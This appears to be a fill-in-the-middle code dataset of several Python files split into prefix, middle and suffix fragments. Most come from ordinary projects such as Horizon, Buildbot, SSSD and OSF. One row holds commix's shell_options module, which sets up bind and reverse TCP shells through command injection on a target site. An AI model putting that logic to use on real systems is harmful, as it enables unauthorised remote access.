repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
|---|---|---|---|---|---|---|---|---|
edublancas/learning
|
quizzes/Scheduler.py
|
Python
|
mit
| 100
| 0.03
|
#This cl
|
ass helps to create reminders for quizzes
#based on the last quiz date and score performance
| |
mrunge/openstack_horizon
|
openstack_horizon/dashboards/admin/aggregates/forms.py
|
Python
|
apache-2.0
| 2,793
| 0
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
from django.utils.translation import ugettext_lazy as _
from horizon_lib import exceptions
from horizon_lib import forms
from horizon_lib import messages
from openstack_horizon import api
from openstack_horizon.dashboards.admin.aggregates import constants
INDEX_URL = constants.AGGREGATES_INDEX_URL
class UpdateAggregateForm(forms.SelfHandlingForm):
name = forms.CharField(label=_("Name"),
max_length=255)
availability_zone = forms.CharField(label=_("Availability Zone"),
max_length=255)
def __init__(self, request, *args, **kwargs):
super(UpdateAggregateForm, self).__init__(request, *args, **kwargs)
def handle(self, request, data):
id = self.initial['id']
name = data['name']
availability_zone = data['availability_zone']
aggregate = {'name': name}
if availability_zone:
aggregate['availability_zone'] = availability_zone
try:
api.nova.aggregate_update(request, id, aggregate)
message = (_('Successfully updated aggregate: "%s."')
% data['name'])
messages.success(request, message)
except Exception:
exceptions.handle(request,
_('Unable to update the aggregate.'))
return True
class UpdateMetadataForm(forms.SelfHandlingForm):
def handle(self, request, data):
id = self.initial['id']
old_metadata = self.initial['metadata']
try:
new_metadata = json.loads(self.data['metadata'])
metadata = dict(
(item['key'], str(item['value']))
for item in new_metadata
)
for key in old_metadata:
if key not in metadata:
metadata[key] = Non
|
e
api.nova.aggregate_set_metadata(request, id, metadata)
message = _('Metadata successfully updated.')
messages.success(request,
|
message)
except Exception:
msg = _('Unable to update the aggregate metadata.')
exceptions.handle(request, msg)
return False
return True
|
alex-ip/geophys2netcdf
|
geophys2netcdf/metadata/_template_metadata.py
|
Python
|
apache-2.0
| 1,884
| 0.009554
|
'''
Created on 20Jan.,2017
@author: Alex Ip
'''
import re
import json
from _metadata import Metadata
class TemplateMetadata(Metadata):
"""Subclass of Metadata to manage template metadata
"""
# Class variable holding metadata type string
_metadata_type_id = 'Template'
_filename_pattern = '.*\.json$' # Default RegEx for finding metadata file.
def __init__(self, source, metadata_object=None):
self._metadata_dict = {}
|
self.metadata_object = None
template_json_file = open(source)
self.template
|
= {str(key): str(value) for key, value in json.load(template_json_file).iteritems()} # Convert from unicode
template_json_file.close()
# Find all elements in templates
element_set = set()
for attribute_text in self.template.values():
for s in re.finditer('%%(.+?)%%', attribute_text):
element_set.add(s.group(1))
self.key_value_dict = {element: None for element in element_set}
if metadata_object:
self.update_text(metadata_object)
def update_text(self, metadata_object):
self.metadata_object = metadata_object
# Update metadata dict from metadata object
for element in self.key_value_dict.keys():
self.key_value_dict[element] = metadata_object.get_metadata(element.split('/')) or 'UNKNOWN'
for attribute_name, attribute_text in self.template.iteritems():
for s in re.finditer('%%(.+?)%%', attribute_text):
element = s.group(1)
attribute_text = attribute_text.replace('%%' + element + '%%', str(self.key_value_dict[element]))
self._metadata_dict[attribute_name.upper()] = attribute_text
|
smalley/cfapi
|
migrations/versions/4b2b7cde821f_add_org_name_to_search.py
|
Python
|
mit
| 2,641
| 0.006816
|
""" Adds organization name to the project search tsv
Revision ID: 4b2b7cde821f
Revises: 15593ff6a15f
Create Date: 2015-11-30 17:21:56.928359
"""
# revision identifiers, used by Alembic.
revision = '4b2b7cde821f'
down_revision = '15593ff6a15f'
from alembic import op
import sqlalchemy as sa
def upgrade():
droptrigger = "DROP TRIGGER IF EXISTS tsvupdate_projects_trigger ON project"
droptriggerfunc = "DROP FUNCTION IF EXISTS project_search_trigger()"
createtriggerfunc = '''
CREATE FUNCTION project_search_trigger() RETURNS trigger AS $$
begin
new.tsv_body :=
setweight(to_tsvector('pg_catalog.english', coalesce(new.status,'')), 'A') ||
setweight(to_tsvector('pg_catalog.english', coalesce(new.tags,'')), 'A') ||
setweight(to_tsvector('pg_catalog.english', coalesce(new.name,'')), 'B') ||
setweight(to_tsvector('pg_catalog.english', coalesce(new.description,'')), 'B') ||
setweight(to_tsvector('pg_catalog.english', coalesce(new.languages,'')), 'A') ||
setweight(to_tsvector('pg_catalog.english', coalesce(new.organization_name,'')), 'A');
return new;
end
$$ LANGUAGE plpgsql;
'''
createtrigger = "CREATE TRIGGER tsvupdate_projects_trigger BEFORE INSERT OR UPDATE ON project FOR EACH ROW EXECUTE PROCEDURE project_search_trigger();"
op.execute(droptrigger)
op.execute(droptriggerfunc)
op.execute(createtriggerfunc)
op.execute(createtrigger)
def downgrade():
droptrigger = "DROP TRIGGER IF EXISTS tsvupdate_projects_trigger ON project"
droptriggerfunc = "DROP FUNCTION IF EXISTS project_search_
|
trigger()"
createtriggerfunc = '''
CREATE FUNCTION project_search_trigger() RETURNS trigger AS $$
begin
new.tsv_body :=
setweight(to_tsvector('pg_catalog.english', coalesce(new.st
|
atus,'')), 'A') ||
setweight(to_tsvector('pg_catalog.english', coalesce(new.tags,'')), 'A') ||
setweight(to_tsvector('pg_catalog.english', coalesce(new.name,'')), 'B') ||
setweight(to_tsvector('pg_catalog.english', coalesce(new.description,'')), 'B') ||
setweight(to_tsvector('pg_catalog.english', coalesce(new.languages,'')), 'A');
return new;
end
$$ LANGUAGE plpgsql;
'''
createtrigger = "CREATE TRIGGER tsvupdate_projects_trigger BEFORE INSERT OR UPDATE ON project FOR EACH ROW EXECUTE PROCEDURE project_search_trigger();"
op.execute(droptrigger)
op.execute(droptriggerfunc)
op.execute(createtriggerfunc)
op.execute(createtrigger)
|
cmouse/buildbot
|
master/buildbot/test/unit/process/test_buildrequest.py
|
Python
|
gpl-2.0
| 28,617
| 0.001433
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
import datetime
import mock
from twisted.internet import defer
from twisted.trial import unittest
from buildbot.process import buildrequest
from buildbot.process.builder import Builder
from buildbot.test import fakedb
from buildbot.test.fake import fakemaster
from buildbot.test.util.misc import TestReactorMixin
class TestBuildRequestCollapser(TestReactorMixin, unittest.TestCase):
@defer.inlineCallbacks
def setUp(self):
self.setUpTestReactor()
self.master = fakemaster.make_master(self, wantData=True, wantDb=True)
self.master.botmaster = mock.Mock(name='botmaster')
self.master.botmaster.builders = {}
self.builders = {}
self.bldr = yield self.createBuilder('A', builderid=77)
@defer.inlineCallbacks
def createBuilder(self, name, builderid=None):
if builderid is None:
b = fakedb.Builder(name=name)
yield self.master.db.insertTestData([b])
builderid = b.id
bldr = mock.Mock(name=name)
bldr.name = name
bldr.master = self.master
self.master.botmaster.builders[name] = bldr
self.builders[name] = bldr
bldr.getCollapseRequestsFn = lambda: False
return bldr
def tearDown(self):
pass
@defer.inlineCallbacks
def do_request_collapse(self, rows, brids, exp):
yield self.master.db.insertTestData(rows)
brCollapser = buildrequest.BuildRequestCollapser(self.master, brids)
self.assertEqual(exp, (yield brCollapser.collapse()))
def test_collapseRequests_no_other_request(self):
def collapseRequests_fn(master, builder, brdict1, brdict2):
# Allow all requests
self.fail("Should never be called")
return True
self.bldr.getCollapseRequestsFn = lambda: collapseRequests_fn
rows = [
fakedb.Builder(id=77, name='A'),
fakedb.SourceStamp(id=234, codebase='A'),
fakedb.Change(changeid=14, codebase='A', sourcestampid=234),
fakedb.Buildset(id=30, reason='foo',
submitted_at=1300305712, results=-1),
fakedb.BuildsetSourceStamp(sourcestampid=234, buildsetid=30),
fakedb.BuildRequest(id=19, buildsetid=30, builderid=77,
priority=13, submitted_at=1300305712, results=-1),
]
return self.do_request_collapse(rows, [19], [])
BASE_ROWS = [
fakedb.Builder(id=77, name='A'),
fakedb.SourceStamp(id=234, codebase='C'),
fakedb.Buildset(id=30, reason='foo',
submitted_at=1300305712, results=-1),
fakedb.BuildsetSourceStamp(sourcestampid=234, buildsetid=30),
fakedb.SourceStamp(id=235, codebase='C'),
fakedb.Buildset(id=31, reason='foo',
submitted_at=1300305712, results=-1),
fakedb.BuildsetSourceStamp(sourcestampid=235, buildsetid=31),
fakedb.SourceStamp(id=236, codebase='C'),
fakedb.Buildset(id=32, reason='foo',
submitted_at=1300305712, results=-1),
fakedb.BuildsetSourceStamp(sourcestampid=236, buildsetid=32),
fakedb.BuildRequest(id=19, buildsetid=30, builderid=77,
priority=13, submitted_at=1300305712, results=-1),
fakedb.BuildRequest(id=20, buildsetid=31, builderid=77,
priority=13, submitted_at=1300305712, results=-1),
fakedb.BuildRequest(id=21, buildsetid=32, builderid=77,
priority=13, submitted_at=1300305712, results=-1),
]
def test_collapseRequests_no_collapse(self):
def collapseRequests_fn(master, builder, brdict1, brdict2):
# Fail all collapse attempts
return False
self.bldr.getCollapseRequestsFn = lambda: collapseRequests_fn
return self.do_request_collapse(self.BASE_ROWS, [21], [])
def test_collapseRequests_collapse_all(self):
def collapseRequests_fn(master, builder, brdict1, brdict2):
# collapse all attempts
return True
self.bldr.getCollapseRequestsFn = lambda: collapseRequests_fn
return self.do_request_collapse(self.BASE_ROWS, [21], [19, 20])
def test_collapseRequests_collapse_all_duplicates(self):
def collapseRequests_fn(master, builder, brdict1, brdict2):
# collapse all attempts
return True
self.bldr.getCollapseRequestsFn = lambda: collapseRequests_fn
return self.do_request_collapse(self.BASE_ROWS, [21, 21], [19, 20])
# As documented:
# Sourcestamps are compatible if all of the below conditions are met:
#
# * Their codebase, branch, project, and repository attributes match exactly
# * Neither source stamp has a patch (e.g., from a try scheduler)
# * Either both source stamps are associated with changes, or neither are associated with
# changes but they have matching revisions.
def makeBuildRequestRows(self, brid, bsid, changeid, ssid, codebase, branch=None,
project=None, repository=None, patchid=None, revision=None):
rows = [
fakedb.SourceStamp(id=ssid, codebase=codebase, branch=branch,
project=project, repository=repository, patchid=patchid,
revision=revision),
fakedb.Buildset(id=bsid, reason='foo',
submitted_at=1300305712, results=-1),
fakedb.BuildsetSourceStamp(sourcestampid=ssid, buildsetid=bsid),
fakedb.BuildRequest(id=brid, buildsetid=bsid, builderid=77,
priority=13, submitted_at=1300305712, results=-1),
]
if changeid:
rows.append(
fakedb.Change(changeid=changeid, branch='trunk', revision='9283',
repository='svn://...', project='world-domination',
sourcestampid=ssid)
)
if patchid:
rows.append(
fakedb.Patch(id=patchid, patch_base64='aGVsbG8sIHdvcmxk',
patch_author='bar', patch_comment='foo', subdir='/foo',
patchlevel=3))
return rows
@defer.inlineCallbacks
def test_collapseRequests_collapse_default_with_codebases(self):
def collapseRequests_fn(master, builder, brdict1, brdict2):
return bu
|
ildrequest.BuildRequest.canBeCollapsed(builder.master, brdict1, brdict2)
rows = [
fakedb.Builder(id=77, name='A'),
]
rows += self.makeBuildRequestRows(22, 122, None, 222, 'A')
rows += self.makeBuildRequestRows(21, 121, None, 221, 'C')
rows += self.makeBuildRequestRows(19, 119, None, 210, '
|
C')
rows += self.makeBuildRequestRows(20, 120, None, 220, 'C')
self.bldr.getCollapseRequestsFn = lambda: Builder._defaultCollapseRequestFn
yield self.do_request_collapse(rows, [22], [])
yield self.do_request_collapse(rows, [21], [19, 20])
@defer.inlineCallbacks
def test_collapseRequests_collapse_default_with_codebases_branches(self):
def collapseRequests_fn(master, builder, brdict1, brdict2):
return buildrequest.BuildRequest.canBeCollapsed(builder.master, brdict1, brdict2)
rows = [
fakedb.Builder(id=77, name='A'),
]
rows += self.makeBuildRequestR
|
danielbair/aeneas
|
aeneas/tests/test_cew.py
|
Python
|
agpl-3.0
| 3,056
| 0.001963
|
#!/usr/bin/env python
# coding=utf-8
# aeneas is a Python/C library and a set of tools
# to automagically synchronize audio and text (aka forced alignment)
#
# Copyright (C) 2012-2013, Alberto Pettarin (www.albertopettarin.it)
# Copyright (C) 2013-2015, ReadBeyond Srl (www.readbeyond.it)
# Copyright (C) 2015-2017, Alberto Pettarin (www.albertopettarin.it)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
import aeneas.globalfunctions as gf
class TestCEW(unittest.TestCase):
def test_cew_synthesize_multiple(self):
handler, output_file_path = gf.tmp_file(suffix=".wav")
try:
c_quit_after = 0.0
c_backwards = 0
c_text = [
(u"en", u"Dummy 1"), # NOTE cew requires the actual eSpeak voice code
(u"en", u"Dummy 2"), # NOTE cew requires the actual eSpeak voice code
(u"en", u"Dummy 3"), # NOTE cew requires the actual eSpeak voice code
]
import aeneas.cew.cew
sr, sf, intervals = aeneas.cew.cew.synthesize_multiple(
output_file_path,
c_quit_after,
c_backwards,
c_text
)
self.assertEqua
|
l(sr, 22050)
self.assertEqual(sf, 3)
self.assertEqual(len(intervals), 3)
except ImportError:
pass
gf.delete_file(handler, output_file_path)
def test_cew_synthesize_multiple_lang(self):
handler, output_file_path = gf.tmp_file(suffix=".wav")
try:
c_quit_after = 0.0
c_backwards = 0
c_tex
|
t = [
(u"en", u"Dummy 1"), # NOTE cew requires the actual eSpeak voice code
(u"it", u"Segnaposto 2"), # NOTE cew requires the actual eSpeak voice code
(u"en", u"Dummy 3"), # NOTE cew requires the actual eSpeak voice code
]
import aeneas.cew.cew
sr, sf, intervals = aeneas.cew.cew.synthesize_multiple(
output_file_path,
c_quit_after,
c_backwards,
c_text
)
self.assertEqual(sr, 22050)
self.assertEqual(sf, 3)
self.assertEqual(len(intervals), 3)
except ImportError:
pass
gf.delete_file(handler, output_file_path)
if __name__ == "__main__":
unittest.main()
|
hackersql/sq1map
|
comm1x/src/core/injections/controller/shell_options.py
|
Python
|
gpl-3.0
| 8,306
| 0.013003
|
#!/usr/bin/env python
# encoding: UTF-8
"""
This file is part of Commix Project (http://commixproject.com).
Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst).
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
For more see the file 'readme/COPYING' for copying permission.
"""
import re
import os
import sys
import time
import urllib
import urlparse
from src.utils import menu
from src.utils import settings
from src.core.injections.controller import checks
from src.thirdparty.colorama import Fore, Back, Style, init
from src.core.shells import bind_tcp
from src.core.shells import reverse_tcp
from src.core.injections.results_based.techniques.classic import cb_injector
from src.core.injections.results_based.techniques.eval_based import eb_injector
from src.core.injections.semiblind.techniques.file_based import fb_injector
"""
Check for established connection
"""
def check_established_connection():
while True:
if settings.VERBOSITY_LEVEL == 1:
print ""
warn_msg = "Something went wrong with the reverse TCP connection."
warn_msg += " Please wait while checking state."
print settings.print_warning_msg(warn_msg)
time.sleep(10)
lines = os.popen('netstat -anta').read().split("\n")
found = False
for line in lines:
if "ESTABLISHED" in line and settings.LPORT in line.split():
found = True
pass
if not found:
return
"""
Execute the bind / reverse TCP shell
"""
def execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, payload, OUTPUT_TEXTFILE):
if settings.EVAL_BASED_STATE != False:
# Command execution results.
start = time.time()
response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
end = time.time()
diff = end - start
# Evaluate injection results.
shell = eb_injector.injection_results(response, TAG, cmd)
else:
# Command execution results.
start = time.time()
if settings.FILE_BASED_STATE == True:
response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
else:
whitespace = settings.WHITESPACE[0]
if whitespace == " ":
whitespace = urllib.quote(whitespace)
response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
end = time.time()
diff = end - start
# Evaluate injection results.
shell = cb_injector.injection_results(response, TAG, cmd)
if settings.REVERSE_TCP and (int(diff) > 0 and int(diff) < 6):
check_established_connection()
else:
if settings.VERBOSITY_LEVEL == 1:
print ""
err_msg = "The " + os_shell_option.split("_")[0] + " "
err_msg += os_shell_option.split("_")[1].upper() + " connection has failed!"
print settings.print_critical_msg(err_msg)
"""
Configure the bind TCP shell
"""
def bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE):
settings.BIND_TCP = True
# Set up RHOST / LPORT for the bind TCP connection.
bind_tcp.configure_bind_tcp()
if settings.BIND_TCP == False:
if settings.REVERSE_TCP == True:
os_shell_option = "reverse_tcp"
reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
return go_back, go_back_again
while True:
if settings.RHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_bind_tcp_options(settings.RHOST)
else:
cmd = bind_tcp.bind_tcp_options()
result = checks.check_bind_tcp_options(cmd)
if result != None:
if result == 0:
go_back_again = False
elif result == 1 or result == 2:
go_back_again = True
settings.BIND_TCP = False
elif result == 3:
settings.BIND_TCP = False
reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
return go_back, go_back_again
# execute bind TCP shell
execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, payload, OUTPUT_TEXTFILE)
"""
Configure the reverse TCP shell
"""
def reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE):
settings.REVERSE_TCP = True
# Set up LHOST / LPORT for the reverse TCP connection.
reverse_tcp.configure_reverse_tcp()
if settings.REVERSE_TCP == False:
if settings.BIND_TCP == True:
os_shell_option = "bind_tcp"
bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
return go_back, go_back_again
while True:
if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(settings.LHOST)
else:
cmd = reverse_tcp.reverse_tcp_options()
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
go_back_again = False
elif result == 1 or result == 2:
go_back_again = True
settings.REVERSE_TCP = False
elif result == 3:
settings.REVERSE_TCP = False
bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
#reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again)
return go_back, go_back_again
# execute reverse TCP shell
execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, payload, OUTPUT_TEXTFILE)
"""
Check commix shell options
"""
def check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again, payload, OUTPUT_TEXTFILE):
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
if os_shell_option == "back" or os_shell_option == True or os_shell_option == False:
go_back = True
if os_shell_option == False:
go_back_again = True
return go_back, go_back_again
# The "os_shell" option
elif os_shell_option == "os_shell":
warn_msg = "You are already i
|
nto the '" + os_shell_option + "' mode."
print settings.print_warning_msg(warn_msg)
return go_back, go_back_again
# The "bind_tcp" option
elif os_shell_option == "bind_tcp":
go_back, go_back_again = bind_t
|
cp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
return go_back, go_back_again
# The "reverse_tcp" option
elif os_shell_option == "reverse_tcp":
go_back, go_back_again = reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
return go_back, go_back_again
# The "q
|
yelley/sssd
|
src/config/SSSDConfigTest.py
|
Python
|
gpl-3.0
| 71,503
| 0.001566
|
#!/usr/bin/python
'''
Created on Sep 18, 2009
@author: sgallagh
'''
import unittest
import os
from stat import *
import sys
srcdir = os.getenv('srcdir')
if srcdir:
sys.path.append("./src/config")
srcdir = srcdir + "/src/config"
else:
srcdir = "."
import SSSDConfig
class SSSDConfigTestValid(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testServices(self):
sssdconfig = SSSDConfig.SSSDConfig(srcdir + "/etc/sssd.api.conf",
srcdir + "/etc/sssd.api.d")
sssdconfig.import_config(srcdir + "/testconfigs/sssd-valid.conf")
# Validate services
services = sssdconfig.list_services()
self.assertTrue('sssd' in services)
self.assertTrue('nss' in services)
self.assertTrue('pam' in services)
#Verify service attributes
sssd_service = sssdconfig.get_service('sssd')
service_opts = sssd_service.list_options()
self.assertTrue('services' in service_opts.keys())
service_list = sssd_service.get_option('services')
self.assertTrue('nss' in service_list)
self.assertTrue('pam' in service_list)
self.assertTrue('domains' in service_opts)
self.assertTrue('reconnection_retries' in service_opts)
del sssdconfig
sssdconfig = SSSDConfig.SSSDConfig(srcdir + "/etc/sssd.api.conf",
srcdir + "/etc/sssd.api.d")
sssdconfig.new_config()
sssdconfig.delete_service('sssd')
new_sssd_service = sssdconfig.new_service('sssd');
new_options = new_sssd_service.list_options();
self.assertTrue('debug_level' in new_options)
self.assertEquals(new_options['debug_level'][0], int)
self.assertTrue('command' in new_options)
self.assertEquals(new_options['command'][0], str)
self.assertTrue('reconnection_retries' in new_options)
self.assertEquals(new_options['reconnection_retries'][0], int)
self.assertTrue('services' in new_options)
self.assertEquals(new_options['debug_level'][0], int)
self.assertTrue('domains' in new_options)
self.assertEquals(new_options['domains'][0], list)
self.assertEquals(new_options['domains'][1], str)
self.assertTrue('sbus_timeout' in new_options)
self.assertEquals(new_options['sbus_timeout'][0], int)
self.assertTrue('re_expression' in new_options)
self.assertEquals(new_options['re_expression'][0], str)
self.assertTrue('full_name_format' in new_options)
self.assertEquals(new_options['full_name_format'][0], str)
self.assertTrue('default_domain_suffix' in new_options)
self.assertEquals(new_options['default_domain_suffix'][0], str)
del sssdconfig
def testDomains(self):
sssdconfig = SSSDConfig.SSSDConfig(srcdir + "/etc/sssd.api.conf",
srcdir + "/etc/sssd.api.d")
sssdconfig.import_config(srcdir + "/testconfigs/sssd-valid.conf")
#Validate domain list
domains = sssdconfig.list_domains()
self.assertTrue('LOCAL' in domains)
self.assertTrue('LDAP' in domains)
self.assertTrue('PROXY' in domains)
self.assertTrue('IPA' in domains)
#Verify domain attributes
ipa_domain = sssdconfig.get_domain('IPA')
domain_opts = ipa_domain.list_options()
self.assertTrue('debug_level' in domain_opts.keys())
self.assertTrue('id_provider' in domain_opts.keys())
self.assertTrue('auth_provider' in domain_opts.keys())
del sssdconfig
def testListProviders(self):
sssdconfig = SSSDConfig.SSSDConfig(srcdir + "/etc/sssd.api.conf",
srcdir + "/etc/sssd.api.d")
sssdconfig.new_config()
junk_domain = sssdconfig.new_domain('junk')
providers = junk_domain.list_providers()
self.assertTrue('ldap' in providers.keys())
def testCreateNewLocalConfig(self):
sssdconfig = SSSDConfig.SSSDConfig(srcdir + "/etc/sssd.api.conf",
srcdir + "/etc/sssd.api.d")
sssdconfig.new_config()
local_domain = sssdconfig.new_domain('LOCAL')
local_domain.add_provider('local', 'id')
local_domain.set_option('debug_level', 1)
local_domain.set_option('default_shell', '/bin/tcsh')
local_domain.set_active(True)
sssdconfig.save_domain(local_domain)
of = '/tmp/testCreateNewLocalConfig.conf'
#Ensure the output file doesn't exist
try:
os.unlink(of)
except:
pass
#Write out the file
sssdconfig.write(of)
#Verify that the output file has the correct permissions
mode = os.stat(of)[ST_MODE]
#Output files should not be readable or writable by
#non-owners, and should not be executable by anyone
self.assertFalse(S_IMODE(mode) & 0177)
#Remove the output file
os.unlink(of)
def testCreateNewLDAPConfig(self):
sssdconfig = SSSDConfig.SSSDConfig(srcdir + "/etc/sssd.api.conf",
srcdir + "/etc/sssd.api.d")
sssdconfig.new_config()
ldap_domain = sssdconfig.new_domain('LDAP')
ldap_domain.add_provider('ldap', 'id')
ldap_domain.set_option('debug_level', 1)
ldap_domain.set_active(True)
sssdconfig.save_domain(ldap_domain)
of = '/tmp/testCreateNewLDAPConfig.conf'
#Ensure the output file doesn't exist
try:
os.unlink(of)
except:
pass
#Write out the file
sssdconfig.write(of)
#Verify that the output file has the correct permissions
mode = os.stat(of)[ST_MODE]
#Output files should not be readable or writable by
#non-owners, and should not be executable by anyone
self.assertFalse(S_IMODE(mode) & 0177)
#Remove the output file
os.unlink(of)
def testModifyExistingConfig(self):
sssdconfig = SSSDConfig.SSSDConfig(srcdir + "/etc/sssd.api.conf",
srcdir + "/etc/sssd.api.d")
sssdconfig
|
.import_config(srcdir + "/testconfigs/sssd-valid.conf")
ldap_domain = sssdconfig.get_domain('LDAP')
ldap_domain.set_option('debug_level', 3)
ldap_domain.remove_provider('auth')
ldap_domain.add_pr
|
ovider('krb5', 'auth')
ldap_domain.set_active(True)
sssdconfig.save_domain(ldap_domain)
of = '/tmp/testModifyExistingConfig.conf'
#Ensure the output file doesn't exist
try:
os.unlink(of)
except:
pass
#Write out the file
sssdconfig.write(of)
#Verify that the output file has the correct permissions
mode = os.stat(of)[ST_MODE]
#Output files should not be readable or writable by
#non-owners, and should not be executable by anyone
self.assertFalse(S_IMODE(mode) & 0177)
#Remove the output file
os.unlink(of)
def testSpaces(self):
sssdconfig = SSSDConfig.SSSDConfig(srcdir + "/etc/sssd.api.conf",
srcdir + "/etc/sssd.api.d")
sssdconfig.import_config(srcdir + "/testconfigs/sssd-valid.conf")
ldap_domain = sssdconfig.get_domain('LDAP')
self.assertEqual(ldap_domain.get_option('auth_provider'), 'ldap')
self.assertEqual(ldap_domain.get_option('id_provider'), 'ldap')
class SSSDConfigTestInvalid(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testBadBool(self):
sssdconfig = SSSDConfig.SSSDConfig(srcdir + "/etc/sssd.api.conf",
srcdir + "/etc/sssd.api.d")
sssdconfig.import_config(srcdir + "/testconfigs/sssd-invalid-badbool.conf")
self.assertRaises(TypeError,
sssdconfig.get_domain,'IPA')
class SSSDConfigTestSSSDService(unittest.TestCase):
def setUp(self):
self.schema = SSSDConfig.SSSDConfigSche
|
reinaH/osf.io
|
website/routes.py
|
Python
|
apache-2.0
| 47,853
| 0.001526
|
# -*- coding: utf-8 -*-
import os
import httplib as http
from flask import request
from flask import send_from_directory
from framework import status
from framework import sentry
from framework.auth import cas
from framework.routing import Rule
from framework.flask import redirect
from framework.sessions import session
from framework.routing import WebRenderer
from framework.exceptions import HTTPError
from framework.auth import get_display_name
from framework.routing import xml_renderer
from framework.routing import json_renderer
from framework.routing import process_rules
from framework.auth import views as auth_views
from framework.routing import render_mako_string
from framework.auth.core import _get_current_user
from website import util
from website import settings
from website import language
from website.util import paths
from website.util import sanitize
from website import landing_pages as landing_page_views
from website import views as website_views
from website.citations import views as citation_views
from website.search import views as search_views
from website.oauth import views as oauth_views
from website.profile import views as profile_views
from website.project import views as project_views
from website.addons.base import views as addon_views
from website.discovery import views as discovery_views
from website.conferences import views as conference_views
from website.notifications import views as notification_views
def get_globals():
    """Context variables that are available for every template rendered by
    OSFWebRenderer.
    """
    # May be None for anonymous visitors; every user-derived value below
    # falls back to an empty string in that case.
    user = _get_current_user()
    return {
        'user_name': user.username if user else '',
        'user_full_name': user.fullname if user else '',
        'user_id': user._primary_key if user else '',
        'user_url': user.url if user else '',
        'user_gravatar': profile_views.current_user_gravatar(size=25)['gravatar_url'] if user else '',
        'user_api_url': user.api_url if user else '',
        'display_name': get_display_name(user.fullname) if user else '',
        'use_cdn': settings.USE_CDN_FOR_CLIENT_LIBS,
        'piwik_host': settings.PIWIK_HOST,
        'piwik_site_id': settings.PIWIK_SITE_ID,
        # Only expose the client-side Sentry DSN when reporting is enabled.
        'sentry_dsn_js': settings.SENTRY_DSN_JS if sentry.enabled else None,
        'dev_mode': settings.DEV_MODE,
        'allow_login': settings.ALLOW_LOGIN,
        'cookie_name': settings.COOKIE_NAME,
        # Flash messages are popped (consumed) here, so each shows only once.
